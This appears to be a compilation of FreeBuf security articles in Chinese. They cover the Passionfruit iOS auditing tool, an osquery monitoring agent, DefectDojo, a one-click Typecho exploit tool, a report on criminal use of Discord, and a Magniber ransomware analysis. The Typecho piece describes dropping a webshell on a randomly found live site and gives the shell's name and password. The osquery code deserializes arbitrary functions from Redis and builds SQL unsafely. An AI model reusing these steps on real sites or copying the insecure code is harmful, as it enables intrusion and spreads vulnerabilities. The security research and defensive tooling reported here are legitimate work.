Passionfruit:iOS应用黑盒评估工具

今天给大家介绍的是一款名叫Passionfruit的iOS应用程序黑盒审计工具,该工具由frida.revuejs共同驱动。

Passionfruit:iOS应用黑盒评估工具

功能介绍

1. 完整的网页版GUI操作界面;

2. 支持未越狱的iOS设备;

3. 屏幕截图;

4. 提供了可读的App元数据;

5. 可检测目标App是否经过加密,以及是否开启了PIE和ARC;

6. App沙盒文件浏览器,可直接预览设备图片、SQLite数据库以及plist文件,你还可以直接下载文件以便进行深入研究;

7. 检测已加载的框架,并挂钩本地原生函数;

8. 记录SQLite操作;

9. 记录并尝试绕过越狱检测;

10. 查看App中的Objective-C类、设置方法和函数钩子、拦截参数;

11. 读取keychain对象;

12. 读取cookie;

工具安装

要求

1. 需要最新版的node.jsyarn来与运行api服务器和网页版GUI界面;

2. macOS系统中安装libimobiledevice

brewinstall libimobiledevice

3. 任意一款现代桌面浏览器;

开启GUI

如果你不需要对项目代码进行自定义修改的话,下面这种方法是最简单的使用方法了。

1. 打开终端,使用cd命令切换到项目目录;

2. 如果你这是第一次克隆这个项目的话,你需要安装npm依赖并构建前端。除此之外,你还需要运行命令npm install或yarn来配置node.js。接下来,运行npm run build或yarn run build来构建bundle。

3. 在浏览器中打开http://localhost:31337,如果端口31337被占用了,你可以在环境变量PORT中设置其他的端口号:PORT12345 npm start

项目开发(可选)

对于那些对此项目感兴趣的开发人员,如果你们想贡献自己的代码,那你可能需要在每一次代码修改之后都要重启api服务器并重新加载Web页面。

API服务器


yarn

npm run dev

Webpack服务器


cd gui

yarn

npm run dev

Frida脚本编译器

首次运行时,我们需要对Frida代理进行编译:

npm run build

如果你需要类似Webpack之类的livereload,你可以使用下列命令:

npm run watch

接下来,在浏览器中打开localhost:8080即可。

工具运行截图

Passionfruit:iOS应用黑盒评估工具

检测url模式以及App元数据:

Passionfruit:iOS应用黑盒评估工具

文件浏览器带有十六进制查看器、图片查看器、Plist文件查看器以及SQLite数据库读取工具:

Passionfruit:iOS应用黑盒评估工具

已加载的框架以及相应的输出符号:

Passionfruit:iOS应用黑盒评估工具

Passionfruit:iOS应用黑盒评估工具

查看Objective-C类和方法:

Passionfruit:iOS应用黑盒评估工具

拦截函数调用、参数以及栈trace:

Passionfruit:iOS应用黑盒评估工具

导出关键窗口的UI描述:

Passionfruit:iOS应用黑盒评估工具

* 参考来源:passionfruit, FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

系统安全监控DIY:动手做Osquery Agent

*本文原创作者:j0hnShi,本文属FreeBuf原创奖励计划,未经许可禁止转载

系统安全的主动监控和被动监控

如何写agent的文章有太多,做系统安全监控的文章也有很多,有些出色的开源安全工具和一些安全服务,其中ossec在众多的企业运用广泛,但复杂的配置和复杂的规则特性很难做到快速部署,对于安全来说时间就是”金钱”,今天我们的主角是facebook开源的osquery,通过集成osquery来实现快速监控系统安全,通过编写简单的agent来做到分布式服务器监控。

Osquary 简介:

• osquery是一个SQL驱动操作系统检测和分析工具。

• 项目主页:http://osquery.io/

• 代码托管地址:https://github.com/facebook/osquer 

Osquery   CentOS 7 安装:

在CentOS 7上安装只要 yum install osquery 就可以了,是不是很简单?

Osquery 缺陷:

But, osquery 有一个很大的缺陷,就是他不能通过远程操作, 至少笔者是没有看到任何远程操作的方案,只有通过定制log日志或者上服务器运行命令才行,这样对我们我们N台服务器的管理和部署就显得及其不方便了,经过一番github上的搜索找到了osqeury的python库,既然能用python来控制他,那就可以做成分布式来agent来管理它。

踩坑:

有方案就会有踩坑,在开发之初,笔者采用的是celery这款分布式列队神器来对各个系统进行管理,但最后发现下发任务只能被执行一次,多个节点没办法做到同事计算,所以对管理大量的服务器来说,它不能胜任,所以还是决定自己动手来实现agent的管理,任务的下发和服务器的监控。

下面我们来看下他的架构:

系统安全监控DIY:动手做Osquery Agent

我们通过生产者消费者模型来出发相关任务,通过让消息队列发送任务,让Client接受到任务(包括定时任务和非定时任务),通过任务的操作,把结果写入到mysql数据库中,并且服务器中的Agent会上报状态给redis,告知服务器的ip和服务器现在的状态等。

代码分服务端和客户端,服务端来发送任务,客户端来执行任务,非常简单,我们来解读下代码:

#主函数
def main(config):
    r = RedisConn(db=6)
     #获得本级IP
    local_ip = getLocalIp()
    #无限循环
    while True:
        #读取redis中的任务,这里的任务是通过ip获取的
        key, data = r.breadpop("tasks" + local_ip)
        #通过dill模块来实现任务执行,这样我们就可以让客户端来执行不同的任务,做到动态执行任务
        d_fun , d_agrs = dill.loads(data)
        d_fun(*d_agrs)

整个客户端就是获取任务,执行任务的过程都是动态的,也就是任务可以进行自定义。

#一个任务,也就是我们执行osquery的方法

def run_task(rules):

    #一样,我们需要获取本机IP

    local_ip = getLocalIp()

    #获得当前时间

    times = time.strftime("%Y-%m-%d %H:%M", time.localtime())

    #连接数据库

    sqlhelp = MySQLHelper(host=“127.0.0.1”, db="Safe_DB", user="root", passwd=“root")

    print("times:",times)

    print(“rules:",str(rules['rules']))

    #osquery接口

    instance = osquery.SpawnInstance()

    instance.open()

    #获得规则

    rules = rules[‘rules']

    for rule in rules:

        #获得规则名

        rule_name = str(rule)#,encoding = “utf-8”)

        #获得规则

        rule = str(rules[rule])#,encoding = "utf-8")

        res_s = []

        try:

            #执行规则

            q = instance.client.query(rule)

            status = q.status.message

            

            if status != "OK":

                print("status:",status)

                continue;

            res_s = q.response

        except Exception as e:

            print("error:",str(e))

            continue;

       #循环查询出的结果

        for res_dict in res_s:

            for res in res_dict:

                pass

                name = res

                data = res_dict[name]

                #print(name)

                #把结果存储数据库

                sql = "insert into osquery_sql(ip_address,rule_name,name,data,time) values('{}','{}','{}','{}','{}')"

                sql = sql.format(local_ip,rule_name,name,data,times)

                print(sql)

                try:

                    sqlhelp.curd(sql)

                except:

                    continue;

是不是非常简单?这样我们就能不断的提供给它规则,让它去执行就可以了,其实在这之前,我们还需要获得agent的相关信息,我给它定义了一个方法叫uploadAgentInfo,我们来看下

#上传agent信息

def uploadAgentInfo():

    #获取本机ip

    local_ip = getLocalIp()

    r = RedisConn(db=7)

    #获取当前时间

    times = time.strftime("%Y-%m-%d %H:%M", time.localtime())

    #判断是否有本机信息

    config = r.hash_get("agent_ip", local_ip)

    if config == None:

        config = {}

        config['sleep'] = 10

        config['run_time'] = times

        #把ip存入redis

        r.hash_set("agent_ip",local_ip,config)

    return config

其实在这个方法中,我们可以看出,它上传了此agent的ip到redis,这样,我们的服务器就能获取到有多少agent和它相关的信息。当然config字典我们可以更加丰富它,并且我们可以,并且也可以做到实时的数据上传。

说完agent,我们来看看服务端,其实服务端非常简单,下面就是服务端的工作,你没看错,就几行代码

if name == "main":

    #消息缓存

    r = RedisConn(db=6)

    #规则缓存(需要手动或者使用脚本在redis中建立规则,redis中的规则用hash存储)

    rule_r = RedisConn(db=9)

    rules = rule_r.hash_get_all("rule")

    param = {"rules": rules}

    #agent端信息

    ip_r = RedisConn(db=7)

    ip_r = ip_r.hash_get_all("agent_ip")

    try:

        #把任务传到redis缓存中

        data = dill.dumps((run_task,[param]))

        for ip in ip_r:

            r.lpush("tasks" + ip,data)

    except Exception as e:

        print("error:" + str(e))

这里需要注意的是,不管在服务端还是在客户端,这套代码是要相同部署的,我们可以用gitlab进行代码更新,用Jenkins来做到自动部署,是不是非常方便?至此,osquery的agent已经全部做完,目前也只是做到数据的采集,对规则和对数据的分析还未开始做,等以后有时间了,还会分享关于osquery的监控规则和对数据的分析,请期待。

完整代码:链接:https://share.weiyun.com/3e60e0ac3b4f007c60f44b534ce61c4c (密码:vRETgT)

*本文原创作者:j0hnShi,本文属FreeBuf原创奖励计划,未经许可禁止转载

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

*本文原创作者:Shad0wpf_,本文属FreeBuf原创奖励计划,未经许可禁止转载

上篇传送门

安全服务工作中,漏洞的跟踪管理,应该是让大多数安全服务人员都头疼的事。业务系统少还好,一个Excel表格就解决了,而面对数十个不同的业务系统,邮件、报告满天飞,Excel大法就行不通了,报告整理、漏洞复测确认常常让人精疲力尽。DefectDojo正是一款解决漏洞管理之痛的开源工具,DefectDojo可将各种漏洞报告(Nessus、Nmap、Burp等)汇总分析,对漏洞的确认、复测进行跟踪,建立计划扫描任务,导出报告等。关于这款工具的更多介绍,可以看看OWASP AppSec USA 2017会议上Greg Anderson的演讲视频

项目地址

https://github.com/OWASP/django-DefectDojo

项目文档

http://defectdojo.readthedocs.io/en/latest/

术语

DefectDojo试图用最少的定义对象来简化系统的操作,下面是一些术语的定义和使用案例,帮助你更好的理解和使用DefectDojo。

Product Types – 产品类型

产品类型用于逻辑区分产品的类型,分类方式可以是业务单元的不同分支,不同办事处、地点或者开发团队。

  • Examples:
    • IAM Team
    • 第三方厂商
    • 成都分公司

Products – 产品

一个项目或者一个产品的名称。

  • Examples:
    • CRM
    • 网上商城

Development Environments – 开发环境

用于描述特定测试,测试对象的环境。

  • Examples:
    • 生产环境
    • 测试环境

Test Types – 测试类型

对一次测试任务中的不同测试点,根据特征分类。

  • Examples:
    • 功能测试
    • 安全测试
    • Nessus扫描
    • API测试

Test – 测试

测试是一次安全工程师对产品缺陷的分析发现过程,测试必须绑定在任务之下,有明确的起止时间和测试类型。

  • Examples:
    • Brup扫描@20171030-20171103
    • Nessus扫描@20171025-20171029

Finding – 测试结果

测试结果表示测试过程中发现的一下软件缺陷,可以通过风险等级分为严重、高危、中危、低危和信息。

  • Examples:
    • OpenSSL ‘ChangeCipherSpec’中间人攻击漏洞
    • CRM系统XX模块XSS漏洞

系统模型

DefectDojo是Rackspace公司的安全团队开发的一套测试跟踪工具,通过报告模板、报告生成、数据统计、基线服务等工具来简化测试过程。DefectDojo的产品:任务模型,能够有效的在多个项目和测试周期中跟踪统计漏洞情况。

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

DefectDojo的工作流程,从产品类型开始;

每个产品类型可以有多个不同的产品;

每个产品可以有一个或多个任务;

每个任务可以有一个或多个测试;

每一个测试,可以有一个或多个测试结果。

案例演示

下面将通过一个简单的案例演示,帮助你快速的了解DefectDojo基本使用。

新建产品类型

使用DefectDojo的第一步,是创建产品类型。

主界面左侧菜单栏,选择ProductsView Product Types

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

点击右上角扳手符号,弹出菜单,选择Add Product Type

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

填写产品类型名称:

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

新建产品

添加产品类型后,接下来创建一个产品。

主界面左侧菜单栏,选择ProductsAll Products

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

点击右上角扳手符号,弹出菜单,选择Add Product

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

填写产品信息:

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

填写后点击Submit提交。

新建开发环境

主界面左侧菜单栏,选择EngagementsDevelopment Environment

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

点击右上角扳手符号,弹出菜单,选择New Dev Environment

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

填写开发环境信息:

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

新建测试类型

测试类型可以帮助你区分你的工作范围,比如Nessus扫描,或定期执行的特定安全测试。

主界面左侧菜单栏,选择EngagementsTest Types

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

点击右上角扳手符号,弹出菜单,选择New Test Type

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

填写测试类型:

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

新建任务

任务名称建议使用英文或拼音,否则生成任务报告时会出错。

主界面左侧菜单栏,选择EngagementsEmgagements

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

点击右上角扳手符号,弹出菜单,选择New Engagement

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

填写任务信息:

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

信息填写完整后选择Done。

任务中添加测试

在任务界面中,点击Tests右边下拉菜单,选择Add Tests:

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

这里有两个选项,Add TestsImport Scan Results,Add Tests创建一个空白测试,可以后期手动添加或导入其它安全软件测试结果,Import Scan Results直接导入一个测试结果,并生成一个Test。

两种方式均需填写此次测试的名称、起止时间等信息:

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

基础信息填写完成后,选择结束,返回的到任务界面中,在Tests中,已列出新建的测试。

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

添加测试结果 – 手工添加

在测试列表后,选择View,进入测试视图:

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

选择FindingsNew Finding

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

填写测试结果信息:

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

添加后如图:

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

点击漏洞名称后的View,可查看漏洞详情,请求复测,添加验证图片等:

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

添加图片:

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

添加图片后现在在这里:

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

添加测试结果 – 导入其它安全工具报告

DefectDojo可以导入多种开源或商业安全工具的扫描结果,如Brup、Nmap、Nessus、ZAP、Nexpose等,也可以参考DefectDojo的通用漏洞格式批量导入其它测试结果,或者编写Python脚本导入国产扫描器绿盟漏扫的报告。

可以通过两种方式导入报告:

  • Tests中的Import Scan Results导入并新建一个Test;
  • 进入一个已创建的Test,选择Re-Upload Scan

这里以导入Nessus报告为例,在Nessus测试列表后,选择View,进入测试视图:

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

选择Nessus ScanRe-Upload Scan

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

填写测试基本信息,选择文件上传:

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

漏洞导入后:

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

Tests统计数据:

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

管理员账号的Team Dashboard显示所有测试任务统计数据和图标:

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

Findings页面中,列出所有的漏洞,可设置条件搜寻特定漏洞,每个漏洞后有该漏洞已存在时长:

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

终端页面中,显示所有已测试过的IP和手工加入的终端地址:

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

点击IP进入该IP详情,可查看该IP存在的所有漏洞:

开源漏洞管理工具DefectDojo(二)使用指南:基本使用

创建用户、删除产品类型等

后台页面地址:http://host/admin/在前台页面中,管理员账号可创建和修改产品类型,但不能删除,需删除可进入后台管理界面操作。前台页面的用户创建,创建时不能直接设置用户密码,可在后台页面创建账号,填写更详细的个人信息,设置权限。

待续

DefectDojo有丰富的统计图表,不同维度的报告生成,漏洞的跟踪、去重等,解决漏洞管理中的一些痛点,这些功能在下一篇介绍。

*本文原创作者:Shad0wpf_,本文属FreeBuf原创奖励计划,未经许可禁止转载

Typecho漏洞利用工具首发,半分钟完成渗透测试

*本文原创作者:expsky,本文属FreeBuf原创奖励计划,未经许可禁止转载

声明:本工具由expsky原创,仅用于技术研究,不恰当使用会对网站造成危害,严禁违法使用,否则后果自负。

Typecho是一个使用较为广泛的轻量博客系统,前几天爆出了一个反序列化远程代码执行漏洞,关于该漏洞的分析见《Typecho反序列化漏洞导致前台getshell》

10月27日官方关于该漏洞给出的说明请看《关于最近的 Typecho 安全漏洞》

除了研究技术,还有更多的人不仅想看下POC,更想知道这个漏洞到底能干什么实实在在的事情,具体什么危害。最好是有什么工具,自动就把这些事情做了。

确实还没有这样的工具,于是我就写了一个漏洞利用的工具,只有一个按钮,你可以什么都不需要懂,只需要点两下就完成了hack。

0×00 运行工具

Typecho漏洞利用工具首发,半分钟完成渗透测试

解开压缩包后,直接执行typecho.exe (lib目录下包含了php相关的库)。

Typecho漏洞利用工具首发,半分钟完成渗透测试

将要进行测试的typecho网站的url复制到最上面的文本框中。

下面大的白框是信息回显窗口。

我通过搜索引擎随机找了一个刚搭建的Typecho网站进行测试。

Typecho漏洞利用工具首发,半分钟完成渗透测试

0×01 检测漏洞

这个漏洞来源于install.php文件,这个文件不会自动删除,但可以被手动删除。

要成功利用该漏洞,网站必须没有删除install.php文件,同时也没有升级到最新的beta修复版本。

选好目标网站后,所以第一步就是检测是否存在漏洞。

Typecho漏洞利用工具首发,半分钟完成渗透测试

选中【检测漏洞】单选钮,再点击【执行】按钮。

如上图,如果成功回显了phpinfo的信息,说明网站存在漏洞,并且可以成功利用。

0×02 释放shell

第二步选中【释放shell】单选钮,再点击【执行】按钮。

Typecho漏洞利用工具首发,半分钟完成渗透测试

如上图:回显“shell释放成功:expsky.php”,说明webshell文件成功生成。

(个别网站如果没有写入权限,这步可能会失败)

0×03 验证shell

对刚刚释放的webshell是否能正常工作进行验证。

Typecho漏洞利用工具首发,半分钟完成渗透测试

第三步选中【验证shell】单选钮,再点击【执行】按钮。

如上图,如果phpinfo再次成功回显,说明刚刚生产的webshell已经可以正常工作。

0×04 菜刀连接webshell

在菜刀中添加webshell

webshell地址:网站域名/expsky.php

webshell密码:expsky

Typecho漏洞利用工具首发,半分钟完成渗透测试

菜刀成功连接,工作正常

Typecho漏洞利用工具首发,半分钟完成渗透测试

上图可以看到我们释放webshell文件expsky.php。

演示完毕,在菜刀里把expsky.php删除了,完成自宫,没干坏事。

0×05 工具下载

通过本工具,不需要懂技术,简单的点几下,半分钟内就可以完成网站的hack。

由于工具进一步完善后可能存在潜在危害,所以不提供源码。

工具下载: https://pan.baidu.com/s/1geYkDwf 密码: dhvi,保证无任何后门(其他任何渠道下载的与本人无关)。

最后再次声明,我开发这个工具仅为了技术研究,严禁非法使用,否则后果自负。

0×06 漏洞修复方法

可以先暂时删除掉根目录下掉 install.php 文件,或者也可以直接升级到最新的 Beta 版。

注意在升级的时候也要覆盖 install.php 文件。

*本文原创作者:,本文属FreeBuf原创奖励计划,未经许可禁止转载

Discord成为暗网中最受欢迎的通讯APP

即便不支持端到端加密,Discord服务仍然突破“重重包围”一举成为了暗网中网络犯罪分子们最喜爱的通讯应用。

Discord成为暗网中最受欢迎的通讯APP

可能你还不敢相信,根据暗网威胁情报公司IntSights在本周发布的分析报告,Discord的受欢迎程度要比排名第二的Telegram高出九倍之多。为了评估网络犯罪分子使用即时通信服务的情况,这份报告中的数据追踪并记录下了在2016年7月到2017年7月之间热门暗网网络犯罪平台上所有的即时通信邀请。

网络犯罪分子使用即时通信服务的情况暴增了三十倍

首先,这项研究的分析成果显示,网络犯罪分子使用即时通信服务的情况相较于以前增长了三十倍左右。你可能第一反应会认为,这是因为之前的三大热门暗网市场(AlphaBayHansaRAMP)倒闭了,所以网络犯罪分子们才不得已使用即时通信应用来进行“沟通交流”。但事实并非如此,因为这三大暗网市场是在7月份被关停的,而这项研究的数据统计是在这之前完成的,因此这两者之间并没有多大关系。所以,这很可能是暗网网络犯罪社区自发地开始转向使用即时通信应用了,而并非是受交易平台被关停的影响。

Discord的受欢迎程度要比排名第二的Telegram高出九倍

报告中还有一个数据非常惊人,即Discord应用的受欢迎程度。这项服务并不支持端到端加密,因此当执法部门要求获取用户数据时,没有任何措施可以保护这些网络犯罪分子们的聊天信息。但既便是如此,这个拥有450万用户的小型移动端即时信息平台其受欢迎程度仍然要比排名第二的Telegram高出九倍。

请大家看看下面这张统计图表,在这项研究进行数据统计的过程中,Discord一直都是网络犯罪分子们的最爱。

Discord成为暗网中最受欢迎的通讯APP

需要注意的是,网络安全公司Flashpoint在四月份曾发布过一份类似的报告【传送门】,但是在他们的这份报告中根本就没有提到Discord的名字,这很可能是因为两家公司收集数据的方式不同,因为IntSight主要是通过分析私聊对话和群组聊天中的邀请链接来进行数据收集的。

话虽如此,但这两家公司的报告中部分细节内容还是相符的,例如今年第一季度中ICQ的普及程度大大提升,这一点在IntSights的报告中也有体现。

Tor的安卓客户端目前仍有大量用户使用

IntSights的报告中还指出,ORBot的使用量同样出现了增长。ORBot是Tor的安卓移动客户端,它的安装量从2014年的100万出头迅速增长到了2016年的1000多万。这也就意味着,虽然很多网络犯罪分子开始转向使用未加密的即时通信客户端,但他们在使用移动客户端时,仍然会通过Tor来代理自己的流量。

Discord成为暗网中最受欢迎的通讯APP

由于越来越多的网络犯罪分子开始使用手机来从事自己的“非法勾当”,所以暗网市场Matanga(专卖违禁药品)在今年的7月份也开始提供专用的移动端App了。这也是一种发展趋势,即违法暗网市场已经不仅仅只有暗网网站了,暗网App的数量也会慢慢开始逐渐增多。 

* 参考来源:bleepingcomputer,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

Magniber剖析:一款只以韩国为攻击目标的勒索软件

Magniber剖析:一款只以韩国为攻击目标的勒索软件

Magnitude攻击工具包在过去几个月里并没有出什么新的幺蛾子,除了以几个亚洲国家为攻击目标的Cerber勒索软件。奇怪的是,Magnitude EK(攻击工具包)在今年9月下旬突然消失,人们猜测这只是在这个急剧收缩的工具包市场中的又一个阵亡者而已,不足为奇。

但是,就在本月中旬,Magnitude EK带着一个新的payload重现江湖。新的恶意程序又是一个全新的勒索软件,被称为Magniber。

外部IP、软件所用语言等信息都显示着这个新型的勒索软件攻击目标的准确性——韩国。以单个国家为攻击目标已经不同寻常,通过多种检查方式保证攻击的准确性更是勒索软件史上的首创。

已分析样本

9bb96afdce48fcf9ba9d6dda2e23c936c661212e8a74114e7813082841667508 -来自Magnitude EK

8968c1b7a7aa95931fcd9b72cdde8416063da27565d5308c818fdaafddfa3b51 -解压的payload

旧样本

ef70f414106ab23358c6734c434cb7dd -主样本(已压缩)

aa8f077a5feeb9fa9dcffd3c69724c942d5ce173519c1c9df838804c9444bd30 -解压的payload

传播方式

到目前为止,我们只发现了Magnitude EK这一种传播途径:

Magniber剖析:一款只以韩国为攻击目标的勒索软件

行为分析

如果该恶意程序在非韩国的系统上执行,它会进行自我删除,运行ping命令时会带来一定的延迟:

Magniber剖析:一款只以韩国为攻击目标的勒索软件

在沙箱中运行该程序可看到如下界面;

Magniber剖析:一款只以韩国为攻击目标的勒索软件

恶意软件以%TEMP%的身份复制,并通过任务调度程序(task scheduler)完成部署:

Magniber剖析:一款只以韩国为攻击目标的勒索软件

在同一个文件夹中,我们还可以看到赎金说明和另一个文件。其名称与特定用户生成的域名中的部分内容相同,扩展名与加密文件的扩展名相同:

Magniber剖析:一款只以韩国为攻击目标的勒索软件

每个加密文件都被添加了一个包含拉丁文字符的扩展名,每个Magniber样本的扩展名均相同。

Magniber剖析:一款只以韩国为攻击目标的勒索软件

相同的纯文本采用的都是相同的加密文本。也就是说,每个文件加密使用的都是同一个密钥。

下图是样本BMP文件被Magniber加密前后的对比图(上边为加密前,下边为加密后)。

Magniber剖析:一款只以韩国为攻击目标的勒索软件

Magniber剖析:一款只以韩国为攻击目标的勒索软件

在加密文件中看不到任何规律性图像,这表明其中已经使用了一些强大的算法,例如CBC模式的AES。

在每个加密文件的开头,我们发现了一个16位的标识符,每个Magniber的样本也都是相同的:

Magniber剖析:一款只以韩国为攻击目标的勒索软件

在完成所有能找到文件的加密以后,勒索软件会自动打开记事本,显示赎金勒索的界面:

Magniber剖析:一款只以韩国为攻击目标的勒索软件

文档结构非常简单,其中给出了多个支付赎金的页面。

赎金支付

赎金支付页面是全英文的,格式与Cerber类似(这是这些勒索软件唯一的相似之处,内部机制完全不同):

Magniber剖析:一款只以韩国为攻击目标的勒索软件

网络通信

我们发现Magniber连接的是由内部算法生成的域。用于CnC的域随后也被用在受害者的个人网站中(只是调用了不同的参数)。调用URL举例:

http://xat91h3evntk5zb66dr.bankme.date/new1
http://xat91h3evntk5zb66dr.bankme.date/end1

将赎金界面的URL与相应运行进行比较:

http://xat91h3evntk5zb66dr.bankme.date/EP866p5M93wDS513

http://xat91h3evntk5zb66dr.jobsnot.services/EP866p5M93wDS513


http://xat91h3evntk5zb66dr.carefit.agency/EP866p5M93wDS513

http://xat91h3evntk5zb66dr.hotdisk.world/EP866p5M93wDS513

程序执行开始时,ransomware向以new1(或new0)结尾的URL发送一个请求。执行结束时,请求end1(或end0)。这些URL的含义将在本文的下一部分中详细解释。

比较有意思的是,如果该受害者的公共IP属于韩国,则服务器响应。否则,响应文本为空。初始请求与响应的例子如下图(请求是从某个韩国IP发起的):

Magniber剖析:一款只以韩国为攻击目标的勒索软件

从上图可以看到,我们得到了一个16个字符长的随机字符串:ce2KPIak3cl6JKm6。新的随机URL只能被请求一次。如果我们尝试重复请求,则响应文本为空。

另一个请求(结尾)也给出了一个16个字符长的随机字符串。但与第一个不同的是,它会对每个请求都作出响应(每次都有一个不同的随机字符串)。示例如下:

Magniber剖析:一款只以韩国为攻击目标的勒索软件

代码研究

很多时候要想了解恶意攻击事件的本质,我们都要对程序代码进行深入的研究。

Magniber的代码被多个加密器进行了压缩,解压需要通过加密器的功能展开。下面这个视频中可以看到当前样本的解压过程。

youtube视频地址:https://www.youtube.com/watch?v=VGOgZ1BXTRE&feature=youtu.be

解开第一层后可以得到一个PE文件:恶意程序的核心。编程人员仅通过按照单个字符的方式把它们加载到内存中,稍微增加了字符串被找到的难度:

Magniber剖析:一款只以韩国为攻击目标的勒索软件

程序执行流程

仔细观察解压的payload,我们可以清楚地看到为什么它不能在大多数系统上运行。开始时,程序员就编写了一个语言检测的命令(使用API函数GetSystemDefaultUILanguage):

Magniber剖析:一款只以韩国为攻击目标的勒索软件

它唯一接受的UI语言就是韩语(代码1042)。如果检测到其它语言,样本就会执行删除动作,不对系统产生危害。这个语言检测功能只在最近的Magniber样本中出现,早期版本中均没有,例如:aa8f077a5feeb9fa9dcffd3c69724c942d5ce173519c1c9df838804c9444bd30

通过语言检测后,Magniber就开始执行一般勒索软件惯用的步骤。过程如下:

1. 创建互斥量对象(Creates mutex)

2. 如果标记文件已被删除,检查temp(临时)文件夹

3. 将自己%TEMP%形式的副本删除并添加任务

4. 查询生成的子域名来检索AES密钥(如果检索到密钥失败,加载硬编码的密钥)

5. 使用所选的扩展名对文件机型枚举和加密

6. 将任务完成的消息传递至CnC

7. 显示勒索页面

8. 自行删除

什么文件或数据会遭到攻击?

Magniber的攻击文件类型非常多,包括文档、源代码文件等等。完整列表如下:

docx xls xlsx ppt pptx pst ost msg em vsd vsdx csv rtf 123 wks wk1 pdf dwg 
onetoc2 snt docb docm dot dotm dotx xlsm xlsb xlw xlt xlm xlc xltx xltm pptm 
pot pps ppsm ppsx ppam potx potm edb hwp 602 sxi sti sldx sldm vdi vmx gpg 
aes raw cgm nef psd ai svg djvu sh class jar java rb asp php jsp brd sch dch 
dip vb vbs ps1 js asm pas cpp cs suo sln ldf mdf ibd myi myd frm odb dbf db 
mdb accdb sq sqlitedb sqlite3 asc lay6 lay mm sxm otg odg uop std sxd otp 
odp wb2 slk dif stc sxc ots ods 3dm max 3ds uot stw sxw ott odt pem p12 csr 
crt key pfx der 1cd cd arw jpe eq adp odm dbc frx db2 dbs pds pdt dt cf cfu 
mx epf kdbx erf vrp grs geo st pff mft efd rib ma lwo lws m3d mb obj x3d c4d 
fbx dgn 4db 4d 4mp abs adn a3d aft ahd alf ask awdb azz bdb bib bnd bok btr 
cdb ckp clkw cma crd dad daf db3 dbk dbt dbv dbx dcb dct dcx dd df1 dmo dnc 
dp1 dqy dsk dsn dta dtsx dx eco ecx emd fcd fic fid fi fm5 fo fp3 fp4 fp5 
fp7 fpt fzb fzv gdb gwi hdb his ib idc ihx itdb itw jtx kdb lgc maq mdn mdt 
mrg mud mwb s3m ndf ns2 ns3 ns4 nsf nv2 nyf oce oqy ora orx owc owg oyx p96 
p97 pan pdb pdm phm pnz pth pwa qpx qry qvd rctd rdb rpd rsd sbf sdb sdf spq 
sqb stp str tcx tdt te tmd trm udb usr v12 vdb vpd wdb wmdb xdb xld xlgc zdb 
zdc cdr cdr3 abw act aim ans apt ase aty awp awt aww bad bbs bdp bdr bean 
bna boc btd cnm crw cyi dca dgs diz dne docz dsv dvi dx eio eit emlx epp err 
etf etx euc faq fb2 fb fcf fdf fdr fds fdt fdx fdxt fes fft flr fodt gtp frt 
fwdn fxc gdoc gio gpn gsd gthr gv hbk hht hs htc hz idx ii ipf jis joe jp1 jrtf
kes klg knt kon kwd lbt lis lit lnt lp2 lrc lst ltr ltx lue luf lwp lyt lyx man 
map mbox me mel min mnt mwp nfo njx now nzb ocr odo of oft ort p7s pfs pjt prt 
psw pu pvj pvm pwi pwr qd rad rft ris rng rpt rst rt rtd rtx run rzk rzn saf 
sam scc scm sct scw sdm sdoc sdw sgm sig sla sls smf sms ssa sty sub sxg tab 
tdf tex text thp tlb tm tmv tmx tpc tvj u3d u3i unx uof upd utf8 utxt vct vnt 
vw wbk wcf wgz wn wp wp4 wp5 wp6 wp7 wpa wpd wp wps wpt wpw wri wsc wsd wsh wtx
xd xlf xps xwp xy3 xyp xyw ybk ym zabw zw abm afx agif agp aic albm apd apm 
apng aps apx art asw bay bm2 bmx brk brn brt bss bti c4 ca cals can cd5 cdc 
cdg cimg cin cit colz cpc cpd cpg cps cpx cr2 ct dc2 dcr dds dgt dib djv dm3 
dmi vue dpx wire drz dt2 dtw dv ecw eip exr fa fax fpos fpx g3 gcdp gfb gfie 
ggr gih gim spr scad gpd gro grob hdp hdr hpi i3d icn icon icpr iiq info ipx 
itc2 iwi j2c j2k jas jb2 jbig jbmp jbr jfif jia jng jp2 jpg2 jps jpx jtf jw 
jxr kdc kdi kdk kic kpg lbm ljp mac mbm mef mnr mos mpf mpo mrxs my ncr nct 
nlm nrw oc3 oc4 oc5 oci omf oplc af2 af3 asy cdmm cdmt cdmz cdt cmx cnv csy 
cv5 cvg cvi cvs cvx cwt cxf dcs ded dhs dpp drw dxb dxf egc emf ep eps epsf 
